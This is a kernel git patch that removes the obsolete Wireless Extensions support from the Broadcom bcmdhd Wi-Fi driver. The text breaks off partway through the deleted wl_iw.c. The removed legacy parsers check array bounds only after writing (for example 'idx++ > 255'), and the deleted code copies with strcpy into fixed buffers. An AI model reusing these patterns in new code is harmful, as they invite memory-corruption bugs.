@@ -1,4341 +0,0 @@ -From 9c5e11d70f209553d023ea2b79efe7b2bf85fd5e Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Tue, 3 Jan 2017 16:21:01 -0800 -Subject: [PATCH] net: wireless: bcmdhd: remove unsed WEXT file. - -WEXT API was already obsoleted and should be removed. - -Bug: 34199963 -Change-Id: Iffb1c81afb9874120c64008c1072eebb8695c65f -Signed-off-by: Insun Song -Bug: 32124445 ---- - drivers/net/wireless/bcmdhd/Kconfig | 8 - - drivers/net/wireless/bcmdhd/dhd_common.c | 203 -- - drivers/net/wireless/bcmdhd/dhd_custom_gpio.c | 7 +- - drivers/net/wireless/bcmdhd/dhd_linux.c | 90 - - drivers/net/wireless/bcmdhd/dhd_linux.h | 5 +- - drivers/net/wireless/bcmdhd/wl_iw.c | 3696 ------------------------- - drivers/net/wireless/bcmdhd/wl_iw.h | 161 -- - 7 files changed, 7 insertions(+), 4163 deletions(-) - delete mode 100644 drivers/net/wireless/bcmdhd/wl_iw.c - delete mode 100644 drivers/net/wireless/bcmdhd/wl_iw.h - -diff --git a/drivers/net/wireless/bcmdhd/Kconfig b/drivers/net/wireless/bcmdhd/Kconfig -index b19c557c8e61b..1ec72f8af16a3 100644 ---- a/drivers/net/wireless/bcmdhd/Kconfig -+++ b/drivers/net/wireless/bcmdhd/Kconfig -@@ -43,14 +43,6 @@ config BCMDHD_NVRAM_PATH - ---help--- - Path to the calibration file. 
- --config BCMDHD_WEXT -- bool "Enable WEXT support" -- depends on BCMDHD && CFG80211 = n -- select WIRELESS_EXT -- select WEXT_PRIV -- help -- Enables WEXT support -- - config DHD_USE_STATIC_BUF - bool "Enable memory preallocation" - depends on BCMDHD -diff --git a/drivers/net/wireless/bcmdhd/dhd_common.c b/drivers/net/wireless/bcmdhd/dhd_common.c -index 0b2ab8e8ac78f..1f457fae6b178 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_common.c -+++ b/drivers/net/wireless/bcmdhd/dhd_common.c -@@ -84,9 +84,6 @@ extern void htsf_update(struct dhd_info *dhd, void *data); - #endif - int dhd_msg_level = DHD_ERROR_VAL; - -- --#include -- - #ifdef SOFTAP - char fw_path2[MOD_PARAM_PATHLEN]; - extern bool softap_enabled; -@@ -2732,203 +2729,3 @@ wl_iw_parse_data_tlv(char** list_str, void *dst, int dst_size, const char token, - return 1; - } - --/* -- * channel list parsing from cscan tlv list --*/ --int --wl_iw_parse_channel_list_tlv(char** list_str, uint16* channel_list, -- int channel_num, int *bytes_left) --{ -- char* str; -- int idx = 0; -- -- if ((list_str == NULL) || (*list_str == NULL) ||(bytes_left == NULL) || (*bytes_left < 0)) { -- DHD_ERROR(("%s error paramters\n", __FUNCTION__)); -- return -1; -- } -- str = *list_str; -- -- while (*bytes_left > 0) { -- -- if (str[0] != CSCAN_TLV_TYPE_CHANNEL_IE) { -- *list_str = str; -- DHD_TRACE(("End channel=%d left_parse=%d %d\n", idx, *bytes_left, str[0])); -- return idx; -- } -- /* Get proper CSCAN_TLV_TYPE_CHANNEL_IE */ -- *bytes_left -= 1; -- str += 1; -- -- if (str[0] == 0) { -- /* All channels */ -- channel_list[idx] = 0x0; -- } -- else { -- channel_list[idx] = (uint16)str[0]; -- DHD_TRACE(("%s channel=%d \n", __FUNCTION__, channel_list[idx])); -- } -- *bytes_left -= 1; -- str += 1; -- -- if (idx++ > 255) { -- DHD_ERROR(("%s Too many channels \n", __FUNCTION__)); -- return -1; -- } -- } -- -- *list_str = str; -- return idx; --} -- --/* -- * SSIDs list parsing from cscan tlv list -- */ --int --wl_iw_parse_ssid_list_tlv(char** 
list_str, wlc_ssid_ext_t* ssid, int max, int *bytes_left) --{ -- char* str; -- int idx = 0; -- -- if ((list_str == NULL) || (*list_str == NULL) || (*bytes_left < 0)) { -- DHD_ERROR(("%s error paramters\n", __FUNCTION__)); -- return -1; -- } -- str = *list_str; -- while (*bytes_left > 0) { -- -- if (str[0] != CSCAN_TLV_TYPE_SSID_IE) { -- *list_str = str; -- DHD_TRACE(("nssid=%d left_parse=%d %d\n", idx, *bytes_left, str[0])); -- return idx; -- } -- -- /* Get proper CSCAN_TLV_TYPE_SSID_IE */ -- *bytes_left -= 1; -- str += 1; -- ssid[idx].rssi_thresh = 0; -- if (str[0] == 0) { -- /* Broadcast SSID */ -- ssid[idx].SSID_len = 0; -- memset((char*)ssid[idx].SSID, 0x0, DOT11_MAX_SSID_LEN); -- *bytes_left -= 1; -- str += 1; -- -- DHD_TRACE(("BROADCAST SCAN left=%d\n", *bytes_left)); -- } -- else if (str[0] <= DOT11_MAX_SSID_LEN) { -- /* Get proper SSID size */ -- ssid[idx].SSID_len = str[0]; -- *bytes_left -= 1; -- str += 1; -- -- /* Get SSID */ -- if (ssid[idx].SSID_len > *bytes_left) { -- DHD_ERROR(("%s out of memory range len=%d but left=%d\n", -- __FUNCTION__, ssid[idx].SSID_len, *bytes_left)); -- return -1; -- } -- -- memcpy((char*)ssid[idx].SSID, str, ssid[idx].SSID_len); -- -- *bytes_left -= ssid[idx].SSID_len; -- str += ssid[idx].SSID_len; -- ssid[idx].hidden = TRUE; -- -- DHD_TRACE(("%s :size=%d left=%d\n", -- (char*)ssid[idx].SSID, ssid[idx].SSID_len, *bytes_left)); -- } -- else { -- DHD_ERROR(("### SSID size more that %d\n", str[0])); -- return -1; -- } -- -- if (idx++ > max) { -- DHD_ERROR(("%s number of SSIDs more that %d\n", __FUNCTION__, idx)); -- return -1; -- } -- } -- -- *list_str = str; -- return idx; --} -- --/* Parse a comma-separated list from list_str into ssid array, starting -- * at index idx. Max specifies size of the ssid array. Parses ssids -- * and returns updated idx; if idx >= max not all fit, the excess have -- * not been copied. Returns -1 on empty string, or on ssid too long. 
-- */ --int --wl_iw_parse_ssid_list(char** list_str, wlc_ssid_t* ssid, int idx, int max) --{ -- char* str, *ptr; -- -- if ((list_str == NULL) || (*list_str == NULL)) -- return -1; -- -- for (str = *list_str; str != NULL; str = ptr) { -- -- /* check for next TAG */ -- if (!strncmp(str, GET_CHANNEL, strlen(GET_CHANNEL))) { -- *list_str = str + strlen(GET_CHANNEL); -- return idx; -- } -- -- if ((ptr = strchr(str, ',')) != NULL) { -- *ptr++ = '\0'; -- } -- -- if (strlen(str) > DOT11_MAX_SSID_LEN) { -- DHD_ERROR(("ssid <%s> exceeds %d\n", str, DOT11_MAX_SSID_LEN)); -- return -1; -- } -- -- if (strlen(str) == 0) -- ssid[idx].SSID_len = 0; -- -- if (idx < max) { -- bzero(ssid[idx].SSID, sizeof(ssid[idx].SSID)); -- strncpy((char*)ssid[idx].SSID, str, sizeof(ssid[idx].SSID) - 1); -- ssid[idx].SSID_len = strlen(str); -- } -- idx++; -- } -- return idx; --} -- --/* -- * Parse channel list from iwpriv CSCAN -- */ --int --wl_iw_parse_channel_list(char** list_str, uint16* channel_list, int channel_num) --{ -- int num; -- int val; -- char* str; -- char* endptr = NULL; -- -- if ((list_str == NULL)||(*list_str == NULL)) -- return -1; -- -- str = *list_str; -- num = 0; -- while (strncmp(str, GET_NPROBE, strlen(GET_NPROBE))) { -- val = (int)strtoul(str, &endptr, 0); -- if (endptr == str) { -- printf("could not parse channel number starting at" -- " substring \"%s\" in list:\n%s\n", -- str, *list_str); -- return -1; -- } -- str = endptr + strspn(endptr, " ,"); -- -- if (num == channel_num) { -- DHD_ERROR(("too many channels (more than %d) in channel list:\n%s\n", -- channel_num, *list_str)); -- return -1; -- } -- -- channel_list[num++] = (uint16)val; -- } -- *list_str = str; -- return num; --} -diff --git a/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c b/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c -index b7d162c2172e5..d366e94d80392 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c -+++ b/drivers/net/wireless/bcmdhd/dhd_custom_gpio.c -@@ -32,7 +32,6 @@ - #include - - 
#include --#include - - #define WL_ERROR(x) printf x - #define WL_TRACE(x) -@@ -140,6 +139,12 @@ dhd_custom_get_mac_address(void *adapter, unsigned char *buf) - } - #endif /* GET_CUSTOM_MAC_ENABLE */ - -+struct cntry_locales_custom { -+ char iso_abbrev[WLC_CNTRY_BUF_SZ]; -+ char custom_locale[WLC_CNTRY_BUF_SZ]; -+ int32 custom_locale_rev; -+}; -+ - /* Customized Locale table : OPTIONAL feature */ - const struct cntry_locales_custom translate_custom_table[] = { - /* Table should be filled out based on custom platform regulatory requirement */ -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c -index 6fa42b097e058..e99abe6c64d27 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.c -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c -@@ -246,12 +246,6 @@ print_tainted() - } - #endif /* LINUX_VERSION_CODE == KERNEL_VERSION(2, 6, 15) */ - --/* Linux wireless extension support */ --#if defined(WL_WIRELESS_EXT) --#include --extern wl_iw_extra_params_t g_wl_iw_params; --#endif /* defined(WL_WIRELESS_EXT) */ -- - #if defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND) - #include - #endif /* defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND) */ -@@ -369,9 +363,6 @@ struct ipv6_work_info_t { - - /* Local private structure (extension of pub) */ - typedef struct dhd_info { --#if defined(WL_WIRELESS_EXT) -- wl_iw_t iw; /* wireless extensions state (must be first) */ --#endif /* defined(WL_WIRELESS_EXT) */ - dhd_pub_t pub; - dhd_if_t *iflist[DHD_MAX_IFS]; /* for supporting multiple interfaces */ - -@@ -692,10 +683,6 @@ int dhd_monitor_init(void *dhd_pub); - int dhd_monitor_uninit(void); - - --#if defined(WL_WIRELESS_EXT) --struct iw_statistics *dhd_get_wireless_stats(struct net_device *dev); --#endif /* defined(WL_WIRELESS_EXT) */ -- - static void dhd_dpc(ulong data); - /* forward decl */ - extern int dhd_wait_pend8021x(struct net_device *dev); -@@ -4040,17 +4027,6 @@ dhd_ioctl_entry(struct net_device *net, 
struct ifreq *ifr, int cmd) - return -1; - } - --#if defined(WL_WIRELESS_EXT) -- /* linux wireless extensions */ -- if ((cmd >= SIOCIWFIRST) && (cmd <= SIOCIWLAST)) { -- /* may recurse, do NOT lock */ -- ret = wl_iw_ioctl(net, ifr, cmd); -- DHD_PERIM_UNLOCK(&dhd->pub); -- DHD_OS_WAKE_UNLOCK(&dhd->pub); -- return ret; -- } --#endif /* defined(WL_WIRELESS_EXT) */ -- - #if LINUX_VERSION_CODE > KERNEL_VERSION(2, 4, 2) - if (cmd == SIOCETHTOOL) { - ret = dhd_ethtool(dhd, (void*)ifr->ifr_data); -@@ -5017,17 +4993,6 @@ dhd_attach(osl_t *osh, struct dhd_bus *bus, uint bus_hdrlen) - dhd_monitor_init(&dhd->pub); - dhd_state |= DHD_ATTACH_STATE_CFG80211; - #endif --#if defined(WL_WIRELESS_EXT) -- /* Attach and link in the iw */ -- if (!(dhd_state & DHD_ATTACH_STATE_CFG80211)) { -- if (wl_iw_attach(net, (void *)&dhd->pub) != 0) { -- DHD_ERROR(("wl_iw_attach failed\n")); -- goto fail; -- } -- dhd_state |= DHD_ATTACH_STATE_WL_ATTACH; -- } --#endif /* defined(WL_WIRELESS_EXT) */ -- - /* attach debug support */ - if (dhd_os_dbg_attach(&dhd->pub)) { - DHD_ERROR(("%s debug module attach failed\n", __FUNCTION__)); -@@ -6831,15 +6796,6 @@ dhd_register_if(dhd_pub_t *dhdp, int ifidx, bool need_rtnl_lock) - net->ethtool_ops = &dhd_ethtool_ops; - #endif /* LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 24) */ - --#if defined(WL_WIRELESS_EXT) --#if WIRELESS_EXT < 19 -- net->get_wireless_stats = dhd_get_wireless_stats; --#endif /* WIRELESS_EXT < 19 */ --#if WIRELESS_EXT > 12 -- net->wireless_handlers = (struct iw_handler_def *)&wl_iw_handler_def; --#endif /* WIRELESS_EXT > 12 */ --#endif /* defined(WL_WIRELESS_EXT) */ -- - dhd->pub.rxsz = DBUS_RX_BUFFER_SIZE_DHD(net); - - memcpy(net->dev_addr, temp_addr, ETHER_ADDR_LEN); -@@ -6862,10 +6818,6 @@ dhd_register_if(dhd_pub_t *dhdp, int ifidx, bool need_rtnl_lock) - printf("Register interface [%s] MAC: "MACDBG"\n\n", net->name, - MAC2STRDBG(net->dev_addr)); - --#if defined(SOFTAP) && defined(WL_WIRELESS_EXT) && !defined(WL_CFG80211) -- 
wl_iw_iscan_set_scan_broadcast_prep(net, 1); --#endif -- - #if defined(BCMLXSDMMC) && (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27)) - if (ifidx == 0) { - #ifdef BCMLXSDMMC -@@ -6993,13 +6945,6 @@ void dhd_detach(dhd_pub_t *dhdp) - } - #endif /* CONFIG_HAS_EARLYSUSPEND && DHD_USE_EARLYSUSPEND */ - --#if defined(WL_WIRELESS_EXT) -- if (dhd->dhd_state & DHD_ATTACH_STATE_WL_ATTACH) { -- /* Detatch and unlink in the iw */ -- wl_iw_detach(); -- } --#endif /* defined(WL_WIRELESS_EXT) */ -- - /* delete all interfaces, start with virtual */ - if (dhd->dhd_state & DHD_ATTACH_STATE_ADD_IF) { - int i = 1; -@@ -7614,26 +7559,6 @@ void dhd_os_prefree(dhd_pub_t *dhdpub, void *addr, uint size) - { - } - --#if defined(WL_WIRELESS_EXT) --struct iw_statistics * --dhd_get_wireless_stats(struct net_device *dev) --{ -- int res = 0; -- dhd_info_t *dhd = DHD_DEV_INFO(dev); -- -- if (!dhd->pub.up) { -- return NULL; -- } -- -- res = wl_iw_get_wireless_stats(dev, &dhd->iw.wstats); -- -- if (res == 0) -- return &dhd->iw.wstats; -- else -- return NULL; --} --#endif /* defined(WL_WIRELESS_EXT) */ -- - static int - dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen, - wl_event_msg_t *event, void **data) -@@ -7656,18 +7581,6 @@ dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen, - if ((dhd->iflist[*ifidx] == NULL) || (dhd->iflist[*ifidx]->net == NULL)) - return BCME_ERROR; - --#if defined(WL_WIRELESS_EXT) -- if (event->bsscfgidx == 0) { -- /* -- * Wireless ext is on primary interface only -- */ -- -- if (dhd->iflist[*ifidx]->net) { -- wl_iw_event(dhd->iflist[*ifidx]->net, event, *data); -- } -- } --#endif /* defined(WL_WIRELESS_EXT) */ -- - #ifdef WL_CFG80211 - - if (dhd->iflist[*ifidx]->net) -@@ -9370,9 +9283,6 @@ static void dhd_hang_process(void *dhd_info, void *event_info, u8 event) - dev_close(dev); - rtnl_unlock(); - #endif --#if defined(WL_WIRELESS_EXT) -- wl_iw_send_priv_event(dev, "HANG"); --#endif - #if defined(WL_CFG80211) - 
wl_cfg80211_hang(dev, WLAN_REASON_UNSPECIFIED); - #endif -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.h b/drivers/net/wireless/bcmdhd/dhd_linux.h -index e3cf3af82e547..b3d836c6b13c0 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.h -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.h -@@ -40,10 +40,7 @@ - #ifdef DHD_WMF - #include - #endif --/* Linux wireless extension support */ --#if defined(WL_WIRELESS_EXT) --#include --#endif /* defined(WL_WIRELESS_EXT) */ -+ - #if defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND) - #include - #endif /* defined(CONFIG_HAS_EARLYSUSPEND) && defined(DHD_USE_EARLYSUSPEND) */ -diff --git a/drivers/net/wireless/bcmdhd/wl_iw.c b/drivers/net/wireless/bcmdhd/wl_iw.c -deleted file mode 100644 -index fc037be8c29c9..0000000000000 ---- a/drivers/net/wireless/bcmdhd/wl_iw.c -+++ /dev/null -@@ -1,3696 +0,0 @@ --/* -- * Linux Wireless Extensions support -- * -- * Copyright (C) 1999-2014, Broadcom Corporation -- * -- * Unless you and Broadcom execute a separate written software license -- * agreement governing use of this software, this software is licensed to you -- * under the terms of the GNU General Public License version 2 (the "GPL"), -- * available at http://www.broadcom.com/licenses/GPLv2.php, with the -- * following added to such license: -- * -- * As a special exception, the copyright holders of this software give you -- * permission to link this software with independent modules, and to copy and -- * distribute the resulting executable under terms of your choice, provided that -- * you also meet, for each linked independent module, the terms and conditions of -- * the license of that module. An independent module is a module which is not -- * derived from this software. The special exception does not apply to any -- * modifications of the software. 
-- * -- * Notwithstanding the above, under no circumstances may you combine this -- * software in any way with any other Broadcom software provided under a license -- * other than the GPL, without Broadcom's express prior written consent. -- * -- * $Id: wl_iw.c 467328 2014-04-03 01:23:40Z $ -- */ -- --#if defined(USE_IW) --#define LINUX_PORT -- --#include --#include --#include -- --#include --#include --#include -- --#include --#include -- --typedef const struct si_pub si_t; --#include -- -- --#include --#include -- -- --/* Broadcom extensions to WEXT, linux upstream has obsoleted WEXT */ --#ifndef IW_AUTH_KEY_MGMT_FT_802_1X --#define IW_AUTH_KEY_MGMT_FT_802_1X 0x04 --#endif -- --#ifndef IW_AUTH_KEY_MGMT_FT_PSK --#define IW_AUTH_KEY_MGMT_FT_PSK 0x08 --#endif -- --#ifndef IW_ENC_CAPA_FW_ROAM_ENABLE --#define IW_ENC_CAPA_FW_ROAM_ENABLE 0x00000020 --#endif -- -- --/* FC9: wireless.h 2.6.25-14.fc9.i686 is missing these, even though WIRELESS_EXT is set to latest -- * version 22. -- */ --#ifndef IW_ENCODE_ALG_PMK --#define IW_ENCODE_ALG_PMK 4 --#endif --#ifndef IW_ENC_CAPA_4WAY_HANDSHAKE --#define IW_ENC_CAPA_4WAY_HANDSHAKE 0x00000010 --#endif --/* End FC9. */ -- --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27)) --#include --#endif --#if defined(SOFTAP) --struct net_device *ap_net_dev = NULL; --tsk_ctl_t ap_eth_ctl; /* apsta AP netdev waiter thread */ --#endif /* SOFTAP */ -- --extern bool wl_iw_conn_status_str(uint32 event_type, uint32 status, -- uint32 reason, char* stringBuf, uint buflen); -- --uint wl_msg_level = WL_ERROR_VAL; -- --#define MAX_WLIW_IOCTL_LEN 1024 -- --/* IOCTL swapping mode for Big Endian host with Little Endian dongle. 
Default to off */ --#define htod32(i) (i) --#define htod16(i) (i) --#define dtoh32(i) (i) --#define dtoh16(i) (i) --#define htodchanspec(i) (i) --#define dtohchanspec(i) (i) -- --extern struct iw_statistics *dhd_get_wireless_stats(struct net_device *dev); --extern int dhd_wait_pend8021x(struct net_device *dev); -- --#if WIRELESS_EXT < 19 --#define IW_IOCTL_IDX(cmd) ((cmd) - SIOCIWFIRST) --#define IW_EVENT_IDX(cmd) ((cmd) - IWEVFIRST) --#endif /* WIRELESS_EXT < 19 */ -- -- --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 8, 0)) --#define DAEMONIZE(a) do { \ -- allow_signal(SIGKILL); \ -- allow_signal(SIGTERM); \ -- } while (0) --#elif ((LINUX_VERSION_CODE < KERNEL_VERSION(3, 8, 0)) && \ -- (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 0))) --#define DAEMONIZE(a) daemonize(a); \ -- allow_signal(SIGKILL); \ -- allow_signal(SIGTERM); --#else /* Linux 2.4 (w/o preemption patch) */ --#define RAISE_RX_SOFTIRQ() \ -- cpu_raise_softirq(smp_processor_id(), NET_RX_SOFTIRQ) --#define DAEMONIZE(a) daemonize(); \ -- do { if (a) \ -- strncpy(current->comm, a, MIN(sizeof(current->comm), (strlen(a) + 1))); \ -- } while (0); --#endif /* LINUX_VERSION_CODE */ -- --#define ISCAN_STATE_IDLE 0 --#define ISCAN_STATE_SCANING 1 -- --/* the buf lengh can be WLC_IOCTL_MAXLEN (8K) to reduce iteration */ --#define WLC_IW_ISCAN_MAXLEN 2048 --typedef struct iscan_buf { -- struct iscan_buf * next; -- char iscan_buf[WLC_IW_ISCAN_MAXLEN]; --} iscan_buf_t; -- --typedef struct iscan_info { -- struct net_device *dev; -- struct timer_list timer; -- uint32 timer_ms; -- uint32 timer_on; -- int iscan_state; -- iscan_buf_t * list_hdr; -- iscan_buf_t * list_cur; -- -- /* Thread to work on iscan */ --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 7, 0)) -- struct task_struct *kthread; --#endif -- long sysioc_pid; -- struct semaphore sysioc_sem; -- struct completion sysioc_exited; -- -- -- char ioctlbuf[WLC_IOCTL_SMLEN]; --} iscan_info_t; --iscan_info_t *g_iscan = NULL; --static void wl_iw_timerfunc(ulong data); 
--static void wl_iw_set_event_mask(struct net_device *dev); --static int wl_iw_iscan(iscan_info_t *iscan, wlc_ssid_t *ssid, uint16 action); -- --/* priv_link becomes netdev->priv and is the link between netdev and wlif struct */ --typedef struct priv_link { -- wl_iw_t *wliw; --} priv_link_t; -- --/* dev to priv_link */ --#if (LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 24)) --#define WL_DEV_LINK(dev) (priv_link_t*)(dev->priv) --#else --#define WL_DEV_LINK(dev) (priv_link_t*)netdev_priv(dev) --#endif -- --/* dev to wl_iw_t */ --#define IW_DEV_IF(dev) ((wl_iw_t*)(WL_DEV_LINK(dev))->wliw) -- --static void swap_key_from_BE( -- wl_wsec_key_t *key --) --{ -- key->index = htod32(key->index); -- key->len = htod32(key->len); -- key->algo = htod32(key->algo); -- key->flags = htod32(key->flags); -- key->rxiv.hi = htod32(key->rxiv.hi); -- key->rxiv.lo = htod16(key->rxiv.lo); -- key->iv_initialized = htod32(key->iv_initialized); --} -- --static void swap_key_to_BE( -- wl_wsec_key_t *key --) --{ -- key->index = dtoh32(key->index); -- key->len = dtoh32(key->len); -- key->algo = dtoh32(key->algo); -- key->flags = dtoh32(key->flags); -- key->rxiv.hi = dtoh32(key->rxiv.hi); -- key->rxiv.lo = dtoh16(key->rxiv.lo); -- key->iv_initialized = dtoh32(key->iv_initialized); --} -- --static int --dev_wlc_ioctl( -- struct net_device *dev, -- int cmd, -- void *arg, -- int len --) --{ -- struct ifreq ifr; -- wl_ioctl_t ioc; -- mm_segment_t fs; -- int ret; -- -- memset(&ioc, 0, sizeof(ioc)); -- ioc.cmd = cmd; -- ioc.buf = arg; -- ioc.len = len; -- -- strcpy(ifr.ifr_name, dev->name); -- ifr.ifr_data = (caddr_t) &ioc; -- -- fs = get_fs(); -- set_fs(get_ds()); --#if defined(WL_USE_NETDEV_OPS) -- ret = dev->netdev_ops->ndo_do_ioctl(dev, &ifr, SIOCDEVPRIVATE); --#else -- ret = dev->do_ioctl(dev, &ifr, SIOCDEVPRIVATE); --#endif -- set_fs(fs); -- -- return ret; --} -- --/* --set named driver variable to int value and return error indication --calling example: dev_wlc_intvar_set(dev, "arate", rate) --*/ 
-- --static int --dev_wlc_intvar_set( -- struct net_device *dev, -- char *name, -- int val) --{ -- char buf[WLC_IOCTL_SMLEN]; -- uint len; -- -- val = htod32(val); -- len = bcm_mkiovar(name, (char *)(&val), sizeof(val), buf, sizeof(buf)); -- DHD_WARN(len, return BCME_ERROR;); -- -- return (dev_wlc_ioctl(dev, WLC_SET_VAR, buf, len)); --} -- --static int --dev_iw_iovar_setbuf( -- struct net_device *dev, -- char *iovar, -- void *param, -- int paramlen, -- void *bufptr, -- int buflen) --{ -- int iolen; -- -- iolen = bcm_mkiovar(iovar, param, paramlen, bufptr, buflen); -- DHD_WARN(iolen, return BCME_ERROR;); -- BCM_REFERENCE(iolen); -- -- return (dev_wlc_ioctl(dev, WLC_SET_VAR, bufptr, iolen)); --} -- --static int --dev_iw_iovar_getbuf( -- struct net_device *dev, -- char *iovar, -- void *param, -- int paramlen, -- void *bufptr, -- int buflen) --{ -- int iolen; -- -- iolen = bcm_mkiovar(iovar, param, paramlen, bufptr, buflen); -- DHD_WARN(iolen, return BCME_ERROR;); -- BCM_REFERENCE(iolen); -- -- return (dev_wlc_ioctl(dev, WLC_GET_VAR, bufptr, buflen)); --} -- --#if WIRELESS_EXT > 17 --static int --dev_wlc_bufvar_set( -- struct net_device *dev, -- char *name, -- char *buf, int len) --{ -- char *ioctlbuf; -- uint buflen; -- int error; -- -- ioctlbuf = kmalloc(MAX_WLIW_IOCTL_LEN, GFP_KERNEL); -- if (!ioctlbuf) -- return -ENOMEM; -- -- buflen = bcm_mkiovar(name, buf, len, ioctlbuf, MAX_WLIW_IOCTL_LEN); -- DHD_WARN(buflen, return BCME_ERROR;); -- error = dev_wlc_ioctl(dev, WLC_SET_VAR, ioctlbuf, buflen); -- -- kfree(ioctlbuf); -- return error; --} --#endif /* WIRELESS_EXT > 17 */ -- --/* --get named driver variable to int value and return error indication --calling example: dev_wlc_bufvar_get(dev, "arate", &rate) --*/ -- --static int --dev_wlc_bufvar_get( -- struct net_device *dev, -- char *name, -- char *buf, int buflen) --{ -- char *ioctlbuf; -- int error; -- -- uint len; -- -- ioctlbuf = kmalloc(MAX_WLIW_IOCTL_LEN, GFP_KERNEL); -- if (!ioctlbuf) -- return -ENOMEM; -- len 
= bcm_mkiovar(name, NULL, 0, ioctlbuf, MAX_WLIW_IOCTL_LEN); -- DHD_WARN(len, return BCME_ERROR;); -- BCM_REFERENCE(len); -- error = dev_wlc_ioctl(dev, WLC_GET_VAR, (void *)ioctlbuf, MAX_WLIW_IOCTL_LEN); -- if (!error) -- bcopy(ioctlbuf, buf, buflen); -- -- kfree(ioctlbuf); -- return (error); --} -- --/* --get named driver variable to int value and return error indication --calling example: dev_wlc_intvar_get(dev, "arate", &rate) --*/ -- --static int --dev_wlc_intvar_get( -- struct net_device *dev, -- char *name, -- int *retval) --{ -- union { -- char buf[WLC_IOCTL_SMLEN]; -- int val; -- } var; -- int error; -- -- uint len; -- uint data_null; -- -- len = bcm_mkiovar(name, (char *)(&data_null), 0, (char *)(&var), sizeof(var.buf)); -- DHD_WARN(len, return BCME_ERROR;); -- error = dev_wlc_ioctl(dev, WLC_GET_VAR, (void *)&var, len); -- -- *retval = dtoh32(var.val); -- -- return (error); --} -- --/* Maintain backward compatibility */ --#if WIRELESS_EXT < 13 --struct iw_request_info --{ -- __u16 cmd; /* Wireless Extension command */ -- __u16 flags; /* More to come ;-) */ --}; -- --typedef int (*iw_handler)(struct net_device *dev, struct iw_request_info *info, -- void *wrqu, char *extra); --#endif /* WIRELESS_EXT < 13 */ -- --#if WIRELESS_EXT > 12 --static int --wl_iw_set_leddc( -- struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, -- char *extra --) --{ -- int dc = *(int *)extra; -- int error; -- -- error = dev_wlc_intvar_set(dev, "leddc", dc); -- return error; --} -- --static int --wl_iw_set_vlanmode( -- struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, -- char *extra --) --{ -- int mode = *(int *)extra; -- int error; -- -- mode = htod32(mode); -- error = dev_wlc_intvar_set(dev, "vlan_mode", mode); -- return error; --} -- --static int --wl_iw_set_pm( -- struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, -- char *extra --) --{ -- int pm = *(int *)extra; -- int error; -- -- 
pm = htod32(pm); -- error = dev_wlc_ioctl(dev, WLC_SET_PM, &pm, sizeof(pm)); -- return error; --} -- --#if WIRELESS_EXT > 17 --#endif /* WIRELESS_EXT > 17 */ --#endif /* WIRELESS_EXT > 12 */ -- --int --wl_iw_send_priv_event( -- struct net_device *dev, -- char *flag --) --{ -- union iwreq_data wrqu; -- char extra[IW_CUSTOM_MAX + 1]; -- int cmd; -- -- cmd = IWEVCUSTOM; -- memset(&wrqu, 0, sizeof(wrqu)); -- if (strlen(flag) > sizeof(extra)) -- return -1; -- -- strcpy(extra, flag); -- wrqu.data.length = strlen(extra); -- wireless_send_event(dev, cmd, &wrqu, extra); -- WL_TRACE(("Send IWEVCUSTOM Event as %s\n", extra)); -- -- return 0; --} -- --static int --wl_iw_config_commit( -- struct net_device *dev, -- struct iw_request_info *info, -- void *zwrq, -- char *extra --) --{ -- wlc_ssid_t ssid; -- int error; -- struct sockaddr bssid; -- -- WL_TRACE(("%s: SIOCSIWCOMMIT\n", dev->name)); -- -- if ((error = dev_wlc_ioctl(dev, WLC_GET_SSID, &ssid, sizeof(ssid)))) -- return error; -- -- ssid.SSID_len = dtoh32(ssid.SSID_len); -- -- if (!ssid.SSID_len) -- return 0; -- -- bzero(&bssid, sizeof(struct sockaddr)); -- if ((error = dev_wlc_ioctl(dev, WLC_REASSOC, &bssid, ETHER_ADDR_LEN))) { -- WL_ERROR(("%s: WLC_REASSOC failed (%d)\n", __FUNCTION__, error)); -- return error; -- } -- -- return 0; --} -- --static int --wl_iw_get_name( -- struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *cwrq, -- char *extra --) --{ -- int phytype, err; -- uint band[3]; -- char cap[5]; -- -- WL_TRACE(("%s: SIOCGIWNAME\n", dev->name)); -- -- cap[0] = 0; -- if ((err = dev_wlc_ioctl(dev, WLC_GET_PHYTYPE, &phytype, sizeof(phytype))) < 0) -- goto done; -- if ((err = dev_wlc_ioctl(dev, WLC_GET_BANDLIST, band, sizeof(band))) < 0) -- goto done; -- -- band[0] = dtoh32(band[0]); -- switch (phytype) { -- case WLC_PHY_TYPE_A: -- strcpy(cap, "a"); -- break; -- case WLC_PHY_TYPE_B: -- strcpy(cap, "b"); -- break; -- case WLC_PHY_TYPE_LP: -- case WLC_PHY_TYPE_G: -- if (band[0] >= 2) -- 
